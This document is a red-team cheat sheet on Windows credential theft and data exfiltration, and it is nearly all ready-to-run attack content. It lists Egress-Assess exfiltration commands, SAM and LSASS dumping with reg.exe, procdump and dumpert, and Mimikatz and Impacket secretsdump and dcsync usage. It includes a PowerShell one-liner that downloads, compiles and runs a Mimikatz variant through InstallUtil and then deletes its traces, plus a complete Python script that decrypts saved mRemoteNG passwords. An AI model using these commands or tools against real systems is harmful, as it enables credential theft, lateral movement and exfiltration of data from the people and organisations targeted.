Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> --username <username> -Password <password> -Datatype ssn

Find intersting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves they have the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/etc.): the client sends credentials to the service (creds are in lsass.exe)

SAM

reg.exe save hklm\sam <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

It is possible to retrieve NTLM hashes without touching lsass. https://github.com/eladshamir/Internal-Monologue

Cache

reg.exe save hklm\security <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::cache
run post/windows/gather/cachedump
LSASS

https://github.com/GhostPack/SafetyKatz

SafetyKatz.exe

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
-----
procdump.exe -accepteula -ma lsass.exe dump.dmp
-----
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]
Logon sessions
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]
sekurlsa::logonPasswords full
load kiwi
creds_all
Mimikatz One-Liner

Katz.cs https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('<URL>','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
mRemoteNG parser

Takes confConfs.xml as input

#!/usr/bin/env python3
import hashlib
import base64
from Cryptodome.Cipher import AES
import argparse
import sys
import re


def parse(conf):
    regex = r"Name=\"(.*?)\".*?Username=\"(.*?)\".*?Password=\"(.*?)\".*?Hostname=\"(.*?)\".*?Protocol=\"(.*?)\""
    
    with open(conf,"r") as f:
        a =f.read()
    
    matches = re.finditer(regex, a, re.MULTILINE)
    
    for matchNum, match in enumerate(matches, start=1):
        m = match.groups()
        print("Name: {}\nUsername: {}\nPassword: {}\nHostname: {}\nProtocol: {}\n".format(m[0],m[1],uncipher(m[2]),m[3],m[4]))
    
def main():
  parser = argparse.ArgumentParser(description="Decrypt mRemoteNG passwords.")
  group = parser.add_mutually_exclusive_group()
  group.add_argument("-f", "--file", help="name of file containing mRemoteNG password")
  parser.add_argument("-p", "--password", help="Custom password", default="mR3m")

  if len(sys.argv) < 2:
    parser.print_help(sys.stderr)
    sys.exit(1)

  args = parser.parse_args()
  encrypted_data = ""
  if args.file != None:
    parse(args.file)

def uncipher(encrypted_data):
  if encrypted_data == "":
      return ""
  encrypted_data = base64.b64decode(encrypted_data)
  salt = encrypted_data[:16]
  associated_data = encrypted_data[:16]
  nonce = encrypted_data[16:32]
  ciphertext = encrypted_data[32:-16]
  tag = encrypted_data[-16:]
  key = hashlib.pbkdf2_hmac("sha1", "mR3m".encode(), salt, 1000, dklen=32)
  cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
  cipher.update(associated_data)
  plaintext = cipher.decrypt_and_verify(ciphertext, tag)
  return(plaintext.decode("utf-8"))

if __name__ == "__main__":
  main()